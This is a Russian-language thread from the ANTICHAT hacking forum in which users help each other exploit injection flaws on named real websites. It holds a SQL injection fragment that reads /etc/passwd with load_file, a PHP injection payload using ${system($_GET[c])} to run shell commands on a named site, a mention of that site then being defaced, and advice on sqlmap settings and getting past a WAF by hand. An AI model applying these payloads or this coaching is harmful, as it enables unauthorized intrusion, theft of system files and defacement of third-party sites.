HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1311  
Старый 01.09.2016, 08:42
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от kacergei  
kacergei said:

Имеется sql-inj через нее можно смотреть файлы
....mid((cast(concat(load_file(/etc/passwd),.....
Возможно ли вывод load_file сделать в base64?
Эм sql на файлы ?! Это как, не я не чего против не имею может просто не знал, если кто прошаренный киньте ссылку на подробное описани
 
Ответить с цитированием

  #1312  
Старый 01.09.2016, 09:21
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

Эм sql на файлы ?! Это как, не я не чего против не имею может просто не знал, если кто прошаренный киньте ссылку на подробное описани
Я наверно немножко неправильно выразился: "Load File: Читает содержимое файла и возвращает его в виде строки."

Если у пользователя достаточно прав

Но вопрос остается открытым
 
Ответить с цитированием

  #1313  
Старый 01.09.2016, 12:23
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от kacergei  
kacergei said:

Имеется sql-inj через нее можно смотреть файлы
....mid((cast(concat(load_file(/etc/passwd),.....
Возможно ли вывод load_file сделать в base64?
можно, а толку, все равно по одному символу выводить
 
Ответить с цитированием

  #1314  
Старый 01.09.2016, 13:38
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

можно, а толку, все равно по одному символу выводить
Не подскажешь как именно? на будущее
 
Ответить с цитированием

  #1315  
Старый 01.09.2016, 15:32
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

 
Ответить с цитированием

  #1316  
Старый 02.09.2016, 02:34
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Как эту php injection раскрутить ?

http://rimo.su/poisk-po-katalogu/?search=${@print(dump.sql)}
 
Ответить с цитированием

  #1317  
Старый 02.09.2016, 02:44
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

?search=${system($_GET[c])}&c=ls -la
 
Ответить с цитированием

  #1318  
Старый 02.09.2016, 03:11
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Вопрос кто сделал что теперь когда переходишь по ссылки там написано "страдать ****" на английском
 
Ответить с цитированием

  #1319  
Старый 02.09.2016, 14:55
r1l
Guest
Сообщений: n/a
Провел на форуме:
4609

Репутация: 0
По умолчанию

Ребят помогите раскрутить

Код:
Code:
http://trafficswirl.com/teamsplash.php?tid=1%27
Ни как мне эта скуля не дается((

с --technique=EU не крутит, --level=5 --risk=3 тоже не крутит, ХАВИДЖИ раскручивает эту уязвимость, sqlmap не может(

либо я дурак либо лыжи правда не едут....

уязвимость раскручивается точно знаю, только как?(
 
Ответить с цитированием

  #1320  
Старый 02.09.2016, 15:18
pw0ned
Guest
Сообщений: n/a
Провел на форуме:
33728

Репутация: 14
По умолчанию

Цитата:
Сообщение от r1l  
r1l said:

Ребят помогите раскрутить
Код:
Code:
http://trafficswirl.com/teamsplash.php?tid=1%27
Ни как мне эта скуля не дается((
с --technique=EU не крутит, --level=5 --risk=3 тоже не крутит, ХАВИДЖИ раскручивает эту уязвимость, sqlmap не может(
либо я дурак либо лыжи правда не едут....
уязвимость раскручивается точно знаю, только как?(
WAF блочит если я не ошибаюсь. Крути руками
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ